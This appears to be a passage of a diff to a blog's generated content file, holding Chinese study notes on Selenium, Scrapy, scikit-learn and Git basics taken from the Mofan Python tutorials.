    12
    13
    14
    15
    16
    17
    from selenium import webdriver

    driver = webdriver.Edge() # 打开 Edge 浏览器

    # 将刚刚复制的帖在这
    driver.get("https://mofanpy.com/")
    driver.find_element_by_xpath(u"//img[@alt='强化学习 (Reinforcement Learning)']").click()
    driver.find_element_by_link_text("About").click()
    driver.find_element_by_link_text(u"赞助").click()
    driver.find_element_by_link_text(u"教程 ▾").click()
    driver.find_element_by_link_text(u"数据处理 ▾").click()
    driver.find_element_by_link_text(u"网页爬虫").click()

    # 得到网页 html, 还能截图
    html = driver.page_source # get html
    driver.get_screenshot_as_file("./img/sreenshot1.png")
    driver.close()

    png

    不过每次都要看着浏览器执行这些操作, 有时候有点不方便. 我们可以让 selenium 不弹出浏览器窗口, 让它安静地执行操作. 在创建 driver 之前定义几个参数就能摆脱浏览器的身体了.

    1
    2
    3
    4
    5
    6
    7
    # 原作者用的是 Chrome..执行不了
    from selenium.webdriver.chrome.options import Options

    chrome_options = Options()
    chrome_options.add_argument("--headless") # define headless

    driver = webdriver.Chrome(chrome_options=chrome_options)

    Selenium 能做的事还有很多, 比如填 Form 表单, 超控键盘等等.
    这个教程不会细说了, 只是个入门, 如果你还想继续深入了解, 欢迎点进去他们的 Python 教学官网

    最后, Selenium 的
    优点我们都看出来了, 可以很方便的帮你模拟你的操作, 添加其它操作也是非常容易的,

    但是也是有缺点的, 不是任何时候 Selenium 都很好. 因为要打开浏览器, 加载更多东西, 它的执行速度肯定没有其它模块快. 所以如果你需要速度, 能不用 Selenium, 就不用吧.

    5.2 高级爬虫: 高效无忧的 Scrapy 爬虫库

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    import scrapy


    class MofanSpider(scrapy.Spider):
    name = "mofan"
    start_urls = [
    'https://mofanpy.com/',
    ]
    # unseen = set()
    # seen = set() # 我们不在需要 set 了, 它自动去重
    def parse(self, response):
    yield { # return some results
    'title': response.css('h1::text').extract_first(default='Missing').strip().replace('"', ""),
    'url': response.url,
    }
    urls = response.css('a::attr(href)').re(r'^/.+?/$') # find all sub urls
    for url in urls:
    yield response.follow(url, callback=self.parse) # it will filter duplication automatically

    这个教程教你写出一个 Scrapy 形式的爬虫, 带你入门 Scrapy, 但是 Scrapy 不仅仅只有爬虫, 你需要学习更多. 那学习 Scrapy 的地方, 当然是他们自家网站咯.

    ]]>
    @@ -9780,7 +9780,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88scikit-learn%EF%BC%89/ - 官网

    课程

    3 如何选择机器学习方法

    流程图

    png

    • classification 分类

    • regression 回归

    • clustering 聚类

    • dimensionality reduction 数据降维

    4 通用学习模式

    导入数据集

    查看 iris 的属性:

    import numpy as np
    from sklearn import datasets
    from sklearn.model_selection import train_test_split # from sklearn.cross_validation import train_test_split
    from sklearn.neighbors import KNeighborsClassifier # KNN K 临近算法

    iris = datasets.load_iris()
    iris_X = iris.data
    iris_y = iris.target

    iris_X[:2, :]
    array([[5.1, 3.5, 1.4, 0.2],       [4.9, 3. , 1.4, 0.2]])

    查看 iris 的分类结果:

    iris_y
    array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,       0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,       0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,       1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,       1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,       2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,       2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2])

    train_test_split 分离数据集(测试集/训练集):

    # 测试集 : 训练集 = 7 : 3
    X_train, X_test, y_train, y_test = train_test_split(iris_X, iris_y, test_size=0.3)
    y_train
    array([1, 0, 2, 2, 2, 0, 2, 2, 2, 1, 1, 0, 0, 0, 0, 0, 0, 2, 0, 1, 0, 2,       0, 0, 1, 0, 0, 1, 1, 2, 0, 1, 2, 2, 2, 2, 2, 2, 1, 2, 0, 0, 2, 2,       0, 1, 1, 2, 2, 2, 2, 0, 0, 2, 1, 1, 1, 2, 2, 1, 0, 2, 1, 2, 0, 0,       1, 0, 2, 1, 2, 0, 1, 2, 1, 2, 1, 0, 0, 1, 1, 2, 2, 1, 0, 2, 1, 1,       0, 0, 1, 1, 1, 2, 0, 0, 2, 1, 2, 2, 1, 2, 1, 2, 2])

    使用 KNN 算法进行分类

    knn = KNeighborsClassifier()
    # fit 训练
    knn.fit(X_train, y_train)
    # predict 生成预测结果
    knn.predict(X_test)
    array([2, 2, 0, 2, 1, 1, 1, 1, 1, 0, 0, 2, 0, 2, 1, 2, 0, 2, 2, 0, 1, 1,       1, 0, 0, 1, 1, 0, 2, 0, 1, 2, 0, 1, 2, 1, 0, 0, 2, 0, 0, 0, 0, 0,       1])
    y_test
    array([1, 2, 0, 2, 1, 1, 1, 1, 1, 0, 0, 2, 0, 2, 1, 1, 0, 2, 2, 0, 1, 1,       1, 0, 0, 1, 1, 0, 1, 0, 1, 2, 0, 1, 2, 1, 0, 0, 2, 0, 0, 0, 0, 0,       1])

    看出预测结果与 y_test 基本相似

    5sklearn 的 datasets 数据库

    from sklearn import datasets
    from sklearn.linear_model import LinearRegression # 线性回归

    loaded_data = datasets.load_boston() # 波士顿房价数据库
    data_X = loaded_data.data
    data_y = loaded_data.target

    model = LinearRegression()
    model.fit(data_X, data_y)

    model.predict(data_X[:4, :])

    # 这里原作者忘记分割数据集了..

    array([30.00384338, 25.02556238, 30.56759672, 28.60703649])
    data_y[:4]
    array([24. , 21.6, 34.7, 33.4])

    创造数据库

    import matplotlib.pyplot as plt

    plt.figure()
    X, y = datasets.make_regression(n_samples=100, n_features=1, n_targets=1, noise=10)
    plt.scatter(X, y)
    plt.show()

    png

    6model 常用属性和功能

    from sklearn import datasets
    from sklearn.linear_model import LinearRegression # 线性回归

    loaded_data = datasets.load_boston() # 波士顿房价数据库
    data_X = loaded_data.data
    data_y = loaded_data.target

    model = LinearRegression()
    model.fit(data_X, data_y)

    model.coef_ 斜率

    在 fit 之后输出的 coef_和 intercept_才会比较准确

    model.coef_  # 各个属性对应的斜率
    array([-1.08011358e-01,  4.64204584e-02,  2.05586264e-02,  2.68673382e+00,       -1.77666112e+01,  3.80986521e+00,  6.92224640e-04, -1.47556685e+00,        3.06049479e-01, -1.23345939e-02, -9.52747232e-01,  9.31168327e-03,       -5.24758378e-01])

    model.intercept_ 截距

    model.intercept_  # 截距(与 Y 轴的交点)
    36.45948838509036

    model.get_params() 查看定义的参数

    model.get_params()
    {'copy_X': True, 'fit_intercept': True, 'n_jobs': None, 'normalize': 'deprecated', 'positive': False}

    model.score() 对 model 学到的东西进行打分

    model.score(data_X, data_y)  # 确定性系数 R^2, 将预测结果与实际结果进行分析, 看吻合程度
    0.7406426641094095

    7 normalization 标准化数据

    preprocessing.scale()

    from sklearn import preprocessing  # 预处理
    import numpy as np

    a = np.array([[10, 2.7, 3.6],
    [-100, 5, -2],
    [120, 20, 40]], dtype=np.float64)
    # 每个列代表一个属性
    # 属性 1 取值范围: [-100, 120]
    # 属性 2 取值范围: [2.7, 20]
    # 属性 3 取值范围: [-2, 40]
    # 各个属性取值范围差距较大
    preprocessing.scale(a)
    array([[ 0.        , -0.85170713, -0.55138018],       [-1.22474487, -0.55187146, -0.852133  ],       [ 1.22474487,  1.40357859,  1.40351318]])

    经过标准化处理后, 各个属性取值范围基本一致

    实例

    from sklearn import preprocessing  # 预处理
    import numpy as np
    from sklearn.model_selection import train_test_split # 分割数据集
    from sklearn.datasets import make_classification # 创建数据
    from sklearn.svm import SVC # Support Vector classifier 支持向量分类器
    import matplotlib.pyplot as plt # 可视化

    X, y = make_classification(n_samples=300, n_features=2, n_redundant=0, n_informative=2,
    random_state=22, n_clusters_per_class=1, scale=100)
    plt.figure()
    plt.scatter(X[:, 0], X[:, 1], c=y) # c=y: color=yellow
    plt.show()

    png

    X, y = make_classification(n_samples=300, n_features=2, n_redundant=0, n_informative=2,
    random_state=22, n_clusters_per_class=1, scale=1000)
    X = preprocessing.scale(X)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.3)
    clf = SVC()
    clf.fit(X_train, y_train)
    # 用 training data 学习, 用 test data 去预测
    clf.score(X_test, y_test)
    0.9222222222222223

    8 cross validation 交叉验证 1

    常规

    from sklearn.datasets import load_iris
    from sklearn.model_selection import train_test_split
    from sklearn.neighbors import KNeighborsClassifier

    iris = load_iris()
    X = iris.data
    y = iris.target

    X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=4)
    knn = KNeighborsClassifier(n_neighbors=5) # 考虑数据附近的 5 给 neighbor
    knn.fit(X_train, y_train)
    y_pred = knn.predict(X_test)
    knn.score(X_test, y_test)
    0.9736842105263158

    交叉验证

    from sklearn.datasets import load_iris
    from sklearn.model_selection import train_test_split
    from sklearn.neighbors import KNeighborsClassifier

    iris = load_iris()
    X = iris.data
    y = iris.target

    from sklearn.model_selection import cross_val_score
    knn = KNeighborsClassifier(n_neighbors=5) # 考虑数据附近的 5 给 neighbor
    scores = cross_val_score(knn, X, y, cv=5, scoring="accuracy") # 判断其准确度是否够高
    scores
    array([0.96666667, 1.        , 0.93333333, 0.96666667, 1.        ])
    scores.mean()  # 平均结果
    0.9733333333333334

    判断如何选择参数取值最佳

    看精确度

    from sklearn.model_selection import cross_val_score
    import matplotlib.pyplot as plt

    k_range = range(1, 31)
    k_scores = []
    for k in k_range:
    knn = KNeighborsClassifier(n_neighbors=k)
    scores = cross_val_score(knn, X, y, cv=10, scoring="accuracy")
    k_scores.append(scores.mean())
    plt.figure()
    plt.plot(k_range, k_scores)
    plt.xlabel("Value of K for KNN")
    plt.ylabel('Cross-Validated Acuracy')
    plt.show()

    png

    • 如果 K 过小, 会出现欠拟合问题
    • 如果 K 过大, 会出现 overfitting 问题(过拟合)

    9 cross validation 交叉验证 2

    过拟合问题

    from sklearn.model_selection import learning_curve  # 可视化训练的过程
    from sklearn.datasets import load_digits
    from sklearn.svm import SVC
    import matplotlib.pyplot as plt
    import numpy as np

    digits = load_digits()
    X = digits.data
    y = digits.target
    train_sizes, train_loss, test_loss = learning_curve(
    SVC(gamma=0.01), X, y, cv=10, scoring='neg_mean_squared_error',
    train_sizes=[0.1, 0.25, 0.5, 0.75, 1])
    train_loss_mean = -np.mean(train_loss, axis=1)
    test_loss_mean = -np.mean(test_loss, axis=1)

    plt.figure()
    plt.plot(train_sizes, train_loss_mean, 'o-', color='r', label='Training')
    plt.plot(train_sizes, test_loss_mean, 'o-', color='g', label='Cross-validation')
    plt.xlabel('Training examples')
    plt.ylabel('Loss')
    plt.legend(loc='best')
    plt.show()

    png

    出现过拟合, 当样本数据量变大时误差率反而增加

    10 cross validation 交叉验证 3

    from sklearn.model_selection import validation_curve
    from sklearn.datasets import load_digits
    from sklearn.svm import SVC
    import matplotlib.pyplot as plt
    import numpy as np

    digits = load_digits()
    X = digits.data
    y = digits.target
    param_range = np.logspace(-6, -2.3, 5)
    train_loss, test_loss = validation_curve(
    SVC(), X, y, param_name='gamma', param_range=param_range, cv=10,
    scoring='neg_mean_squared_error')
    train_loss_mean = -np.mean(train_loss, axis=1)
    test_loss_mean = -np.mean(test_loss, axis=1)

    plt.figure()
    plt.plot(param_range, train_loss_mean, 'o-', color='r', label='Training')
    plt.plot(param_range, test_loss_mean, 'o-', color='g', label='Cross-validation')
    plt.xlabel('gamma')
    plt.ylabel('Loss')
    plt.legend(loc='best')
    plt.show()

    png

    11 保存 model

    from sklearn import svm
    from sklearn import datasets

    clf = svm.SVC()
    iris = datasets.load_iris()
    X, y = iris.data, iris.target
    clf.fit(X, y)
    SVC()

    方法 1: pickle

    导出

    import pickle

    with open('save/clf.pickle', 'wb') as f:
    pickle.dump(clf, f)

    导入

    with open('save/clf.pickle', 'rb') as f:
    clf2 = pickle.load(f)
    clf2.predict(X[0:1])
    array([0])

    方法 2: joblib

    导出

    import joblib

    joblib.dump(clf, 'save/clf.pkl')
    ['save/clf.pkl']

    导入

    clf3 = joblib.load('save/clf.pkl')
    clf3.predict(X[0:1])
    array([0])
    ]]>
    + 官网

    课程

    3 如何选择机器学习方法

    流程图

    png

    • classification 分类

    • regression 回归

    • clustering 聚类

    • dimensionality reduction 数据降维

    4 通用学习模式

    导入数据集

    查看 iris 的属性:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import numpy as np
    from sklearn import datasets
    from sklearn.model_selection import train_test_split # from sklearn.cross_validation import train_test_split
    from sklearn.neighbors import KNeighborsClassifier # KNN K 临近算法

    iris = datasets.load_iris()
    iris_X = iris.data
    iris_y = iris.target

    iris_X[:2, :]
    array([[5.1, 3.5, 1.4, 0.2],       [4.9, 3. , 1.4, 0.2]])

    查看 iris 的分类结果:

    1
    iris_y
    array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,       0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,       0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,       1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,       1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,       2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,       2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2])

    train_test_split 分离数据集(测试集/训练集):

    1
    2
    3
    # 测试集 : 训练集 = 7 : 3
    X_train, X_test, y_train, y_test = train_test_split(iris_X, iris_y, test_size=0.3)
    y_train
    array([1, 0, 2, 2, 2, 0, 2, 2, 2, 1, 1, 0, 0, 0, 0, 0, 0, 2, 0, 1, 0, 2,       0, 0, 1, 0, 0, 1, 1, 2, 0, 1, 2, 2, 2, 2, 2, 2, 1, 2, 0, 0, 2, 2,       0, 1, 1, 2, 2, 2, 2, 0, 0, 2, 1, 1, 1, 2, 2, 1, 0, 2, 1, 2, 0, 0,       1, 0, 2, 1, 2, 0, 1, 2, 1, 2, 1, 0, 0, 1, 1, 2, 2, 1, 0, 2, 1, 1,       0, 0, 1, 1, 1, 2, 0, 0, 2, 1, 2, 2, 1, 2, 1, 2, 2])

    使用 KNN 算法进行分类

    1
    2
    3
    4
    5
    knn = KNeighborsClassifier()
    # fit 训练
    knn.fit(X_train, y_train)
    # predict 生成预测结果
    knn.predict(X_test)
    array([2, 2, 0, 2, 1, 1, 1, 1, 1, 0, 0, 2, 0, 2, 1, 2, 0, 2, 2, 0, 1, 1,       1, 0, 0, 1, 1, 0, 2, 0, 1, 2, 0, 1, 2, 1, 0, 0, 2, 0, 0, 0, 0, 0,       1])
    1
    y_test
    array([1, 2, 0, 2, 1, 1, 1, 1, 1, 0, 0, 2, 0, 2, 1, 1, 0, 2, 2, 0, 1, 1,       1, 0, 0, 1, 1, 0, 1, 0, 1, 2, 0, 1, 2, 1, 0, 0, 2, 0, 0, 0, 0, 0,       1])

    看出预测结果与 y_test 基本相似

    5sklearn 的 datasets 数据库

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    from sklearn import datasets
    from sklearn.linear_model import LinearRegression # 线性回归

    loaded_data = datasets.load_boston() # 波士顿房价数据库
    data_X = loaded_data.data
    data_y = loaded_data.target

    model = LinearRegression()
    model.fit(data_X, data_y)

    model.predict(data_X[:4, :])

    # 这里原作者忘记分割数据集了..

    array([30.00384338, 25.02556238, 30.56759672, 28.60703649])
    1
    data_y[:4]
    array([24. , 21.6, 34.7, 33.4])

    创造数据库

    1
    2
    3
    4
    5
    6
    import matplotlib.pyplot as plt

    plt.figure()
    X, y = datasets.make_regression(n_samples=100, n_features=1, n_targets=1, noise=10)
    plt.scatter(X, y)
    plt.show()

    png

    6model 常用属性和功能

    1
    2
    3
    4
    5
    6
    7
    8
    9
    from sklearn import datasets
    from sklearn.linear_model import LinearRegression # 线性回归

    loaded_data = datasets.load_boston() # 波士顿房价数据库
    data_X = loaded_data.data
    data_y = loaded_data.target

    model = LinearRegression()
    model.fit(data_X, data_y)

    model.coef_ 斜率

    在 fit 之后输出的 coef_和 intercept_才会比较准确

    1
    model.coef_  # 各个属性对应的斜率
    array([-1.08011358e-01,  4.64204584e-02,  2.05586264e-02,  2.68673382e+00,       -1.77666112e+01,  3.80986521e+00,  6.92224640e-04, -1.47556685e+00,        3.06049479e-01, -1.23345939e-02, -9.52747232e-01,  9.31168327e-03,       -5.24758378e-01])

    model.intercept_ 截距

    1
    model.intercept_  # 截距(与 Y 轴的交点)
    36.45948838509036

    model.get_params() 查看定义的参数

    1
    model.get_params()
    {'copy_X': True, 'fit_intercept': True, 'n_jobs': None, 'normalize': 'deprecated', 'positive': False}

    model.score() 对 model 学到的东西进行打分

    1
    model.score(data_X, data_y)  # 确定性系数 R^2, 将预测结果与实际结果进行分析, 看吻合程度
    0.7406426641094095

    7 normalization 标准化数据

    preprocessing.scale()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    from sklearn import preprocessing  # 预处理
    import numpy as np

    a = np.array([[10, 2.7, 3.6],
    [-100, 5, -2],
    [120, 20, 40]], dtype=np.float64)
    # 每个列代表一个属性
    # 属性 1 取值范围: [-100, 120]
    # 属性 2 取值范围: [2.7, 20]
    # 属性 3 取值范围: [-2, 40]
    # 各个属性取值范围差距较大
    preprocessing.scale(a)
    array([[ 0.        , -0.85170713, -0.55138018],       [-1.22474487, -0.55187146, -0.852133  ],       [ 1.22474487,  1.40357859,  1.40351318]])

    经过标准化处理后, 各个属性取值范围基本一致

    实例

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    from sklearn import preprocessing  # 预处理
    import numpy as np
    from sklearn.model_selection import train_test_split # 分割数据集
    from sklearn.datasets import make_classification # 创建数据
    from sklearn.svm import SVC # Support Vector classifier 支持向量分类器
    import matplotlib.pyplot as plt # 可视化

    X, y = make_classification(n_samples=300, n_features=2, n_redundant=0, n_informative=2,
    random_state=22, n_clusters_per_class=1, scale=100)
    plt.figure()
    plt.scatter(X[:, 0], X[:, 1], c=y) # c=y: color=yellow
    plt.show()

    png

    1
    2
    3
    4
    5
    6
    7
    8
    X, y = make_classification(n_samples=300, n_features=2, n_redundant=0, n_informative=2,
    random_state=22, n_clusters_per_class=1, scale=1000)
    X = preprocessing.scale(X)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.3)
    clf = SVC()
    clf.fit(X_train, y_train)
    # 用 training data 学习, 用 test data 去预测
    clf.score(X_test, y_test)
    0.9222222222222223

    8 cross validation 交叉验证 1

    常规

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    from sklearn.datasets import load_iris
    from sklearn.model_selection import train_test_split
    from sklearn.neighbors import KNeighborsClassifier

    iris = load_iris()
    X = iris.data
    y = iris.target

    X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=4)
    knn = KNeighborsClassifier(n_neighbors=5) # 考虑数据附近的 5 给 neighbor
    knn.fit(X_train, y_train)
    y_pred = knn.predict(X_test)
    knn.score(X_test, y_test)
    0.9736842105263158

    交叉验证

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    from sklearn.datasets import load_iris
    from sklearn.model_selection import train_test_split
    from sklearn.neighbors import KNeighborsClassifier

    iris = load_iris()
    X = iris.data
    y = iris.target

    from sklearn.model_selection import cross_val_score
    knn = KNeighborsClassifier(n_neighbors=5) # 考虑数据附近的 5 给 neighbor
    scores = cross_val_score(knn, X, y, cv=5, scoring="accuracy") # 判断其准确度是否够高
    scores
    array([0.96666667, 1.        , 0.93333333, 0.96666667, 1.        ])
    1
    scores.mean()  # 平均结果
    0.9733333333333334

    判断如何选择参数取值最佳

    看精确度

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    from sklearn.model_selection import cross_val_score
    import matplotlib.pyplot as plt

    k_range = range(1, 31)
    k_scores = []
    for k in k_range:
    knn = KNeighborsClassifier(n_neighbors=k)
    scores = cross_val_score(knn, X, y, cv=10, scoring="accuracy")
    k_scores.append(scores.mean())
    plt.figure()
    plt.plot(k_range, k_scores)
    plt.xlabel("Value of K for KNN")
    plt.ylabel('Cross-Validated Acuracy')
    plt.show()

    png

    • 如果 K 过小, 会出现欠拟合问题
    • 如果 K 过大, 会出现 overfitting 问题(过拟合)

    9 cross validation 交叉验证 2

    过拟合问题

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    from sklearn.model_selection import learning_curve  # 可视化训练的过程
    from sklearn.datasets import load_digits
    from sklearn.svm import SVC
    import matplotlib.pyplot as plt
    import numpy as np

    digits = load_digits()
    X = digits.data
    y = digits.target
    train_sizes, train_loss, test_loss = learning_curve(
    SVC(gamma=0.01), X, y, cv=10, scoring='neg_mean_squared_error',
    train_sizes=[0.1, 0.25, 0.5, 0.75, 1])
    train_loss_mean = -np.mean(train_loss, axis=1)
    test_loss_mean = -np.mean(test_loss, axis=1)

    plt.figure()
    plt.plot(train_sizes, train_loss_mean, 'o-', color='r', label='Training')
    plt.plot(train_sizes, test_loss_mean, 'o-', color='g', label='Cross-validation')
    plt.xlabel('Training examples')
    plt.ylabel('Loss')
    plt.legend(loc='best')
    plt.show()

    png

    出现过拟合, 当样本数据量变大时误差率反而增加

    10 cross validation 交叉验证 3

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    from sklearn.model_selection import validation_curve
    from sklearn.datasets import load_digits
    from sklearn.svm import SVC
    import matplotlib.pyplot as plt
    import numpy as np

    digits = load_digits()
    X = digits.data
    y = digits.target
    param_range = np.logspace(-6, -2.3, 5)
    train_loss, test_loss = validation_curve(
    SVC(), X, y, param_name='gamma', param_range=param_range, cv=10,
    scoring='neg_mean_squared_error')
    train_loss_mean = -np.mean(train_loss, axis=1)
    test_loss_mean = -np.mean(test_loss, axis=1)

    plt.figure()
    plt.plot(param_range, train_loss_mean, 'o-', color='r', label='Training')
    plt.plot(param_range, test_loss_mean, 'o-', color='g', label='Cross-validation')
    plt.xlabel('gamma')
    plt.ylabel('Loss')
    plt.legend(loc='best')
    plt.show()

    png

    11 保存 model

    1
    2
    3
    4
    5
    6
    7
    from sklearn import svm
    from sklearn import datasets

    clf = svm.SVC()
    iris = datasets.load_iris()
    X, y = iris.data, iris.target
    clf.fit(X, y)
    SVC()

    方法 1: pickle

    导出

    1
    2
    3
    4
    import pickle

    with open('save/clf.pickle', 'wb') as f:
    pickle.dump(clf, f)

    导入

    1
    2
    3
    with open('save/clf.pickle', 'rb') as f:
    clf2 = pickle.load(f)
    clf2.predict(X[0:1])
    array([0])

    方法 2: joblib

    导出

    1
    2
    3
    import joblib

    joblib.dump(clf, 'save/clf.pkl')
    ['save/clf.pkl']

    导入

    1
    2
    clf3 = joblib.load('save/clf.pkl')
    clf3.predict(X[0:1])
    array([0])
    ]]>
    @@ -9834,7 +9834,7 @@ /posts/Git-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88git%EF%BC%89/ - 官网

    Git 版本管理 教程系列 | 莫烦 Python (yulizi123.github.io)

    【莫烦 Python】Git 代码版本管理教程

    Git (git-scm.com)

    课程

    Git 安装

    Ubuntu:

    sudo apt-get install git-all

    查看用户名和用户邮箱

    用户名:

    $ git config user.name
    metal-cell

    用户邮箱:

    $ git config user.email
    XXX@qq.com

    Git 流程图

    png

    • Untracked: 未跟踪
    • Unmodified: 未修改
    • Modified: 修改过
    • Staged: 暂存

    创建/修改 版本库

    $ git init
    Initialized empty Git repository in D:/Study/0th-year-master/gitTUT/.git/

    png

    新建一个1.py文件

    png

    git status 查看版本库的状态

    $ git status
    On branch master

    No commits yet

    Untracked files:
    (use "git add <file>..." to include in what will be committed)

    1.py

    nothing added to commit but untracked files present (use "git add" to track)

    png

    git add 添加进版本库

    现在1.py并没有被放入版本库中(Unstaged), 所以我们要使用add把它添加进版本库(staged):

    $ git add 1.py

    png

    $ git status
    On branch master

    No commits yet

    Changes to be committed:
    (use "git rm --cached <file>..." to unstage)

    new file: 1.py

    git add .一次性添加文件夹中所有未被添加的文件

    $ git .

    git commit 提交改变

    $ git commit -m "create 1.py"
    [master (root-commit) 3520206] create 1.py
    1 file changed, 0 insertions(+), 0 deletions(-)
    create mode 100644 1.py

    png

    记录修改(log & diff)

    修改记录 log

    $ git log
    commit XXX (HEAD -> master)
    Author: XXX <XXX@qq.com>
    Date: Sat Aug 13 11:53:09 2022 +0800

    create 1.py

    我们对1.py文件进行一次修改:

    png

    然后我们就能在status中看到修改还没被提交的信息了

    $ git status
    On branch master
    Changes not staged for commit:
    (use "git add <file>..." to update what will be committed)
    (use "git checkout -- <file>..." to discard changes in working directory)

    modified: 1.py

    no changes added to commit (use "git add" and/or "git commit -a")

    把这次修改添加(add)到可被提交的(commit)的状态, 然后再提交(commit)这次的修改:

    $ git add 1.py
    $ git commit -m "change 1"
    [master 2b5d3bc] change 1
    1 file changed, 1 insertion(+)

    png

    再次查看 log, 现在我们就能看到 create 1.pychange 1 这两条修改信息了. 而且做出这两条 commit 的 ID, 修改的 Author, 修改 Date 也被显示在上面.

    $ git log
    commit XXX (HEAD -> master)
    Author: XXX <XXX@qq.com>
    Date: Sat Aug 13 12:15:33 2022 +0800

    change 1

    commit XXXX
    Author: XXX <XXX@qq.com>
    Date: Sat Aug 13 11:53:09 2022 +0800

    create 1.py

    如果删除一部分代码, 也会被记录上, 比如把 a = 1 改成 a = 2, 再添加一个 b = 1.

    png

    查看 unstaged

    $ git diff
    diff --git a/1.py b/1.py
    index d25d49e..61ce15f 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,2 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    \ No newline at end of file

    png

    查看 staged (–cached)

    如果想要查看这次还没 add (unstaged) 的修改部分 和上个已经 commit 的文件有何不同, 我们将使用 $ git diff:

    $ git add .
    diff --git a/1.py b/1.py
    index d25d49e..61ce15f 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,2 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    \ No newline at end of file

    查看 staged & unstaged (HEAD)

    还有种方法让我们可以查看 add 过 (staged) 和 没 add (unstaged) 的修改, 比如我们再修改一下 1.py 但不 add:

    png

    png

    # 对比三种不同的 diff 形式
    $ git diff HEAD # staged & unstaged
    diff --git a/1.py b/1.py
    index d25d49e..ac13cf6 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,3 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    +c = b
    \ No newline at end of file
    $ git diff  # unstaged
    diff --git a/1.py b/1.py
    index 61ce15f..ac13cf6 100644
    --- a/1.py
    +++ b/1.py
    @@ -1,2 +1,3 @@
    a = 2
    -b = 1
    \ No newline at end of file
    +b = 1
    +c = b
    \ No newline at end of file
    $ git diff --cached  # staged
    diff --git a/1.py b/1.py
    index d25d49e..61ce15f 100644
    --- a/1.py
    +++ b/1.py
    @@ -1 +1,2 @@
    -a = 1
    \ No newline at end of file
    +a = 2
    +b = 1
    \ No newline at end of file

    为了下节内容, 我们保持这次修改, 全部 add 变成 staged 状态, 并 commit.

    $ git add .
    $ git commit -m "change 2"
    [master 8f0a599] change 2
    1 file changed, 3 insertions(+), 1 deletion(-)

    png

    回到从前

    修改已 commit 的版本

    有时候我们总会忘了什么, 比如已经提交了 commit 却发现在这个 commit 中忘了附上另一个文件. 接下来我们模拟这种情况. 上节内容中, 我们最后一个 commitchange 2, 我们将要添加另外一个文件, 将这个修改也 commitchange 2. 所以我们复制 1.py 这个文件, 改名为 2.py. 并把 2.py 变成 staged, 然后使用 --amend 将这次改变合并到之前的 change 2 中.

    png

    $ git add 2.py
    $ git commit --amend --no-edit
    [master dc47039] change 2
    Date: Sat Aug 13 12:41:55 2022 +0800
    2 files changed, 6 insertions(+), 1 deletion(-)
    create mode 100644 2.py

    --no-edit: 不编辑, 直接合并到上一个 commit

    $ git log --oneline
    dc47039 (HEAD -> master) change 2
    2b5d3bc change 1
    3520206 create 1.py

    reset 回到 add 之前

    有时我们添加 add 了修改, 但是又后悔, 并想补充一些内容再 add. 这时, 我们有一种方式可以回到 add 之前. 比如在 1.py 文件中添加这一行:

    png

    然后 addstaged 再返回到 add 之前:

    $ git add 1.py
    $ git status -s
    M 1.py
    $ git reset 1.py
    Unstaged changes after reset:
    M 1.py
    $ git status -s
    M 1.py

    png

    reset 回到 commit 之前

    png

    每个 commit 都有自己的 id 数字号, HEAD 是一个指针, 指引当前的状态是在哪个 commit. 最近的一次 commit 在最右边, 我们如果要回到过去, 就是让 HEAD 回到过去并 reset 此时的 HEAD 到过去的位置.

    $ git reset --hard HEAD
    HEAD is now at dc47039 change 2

    查看所有的 log:

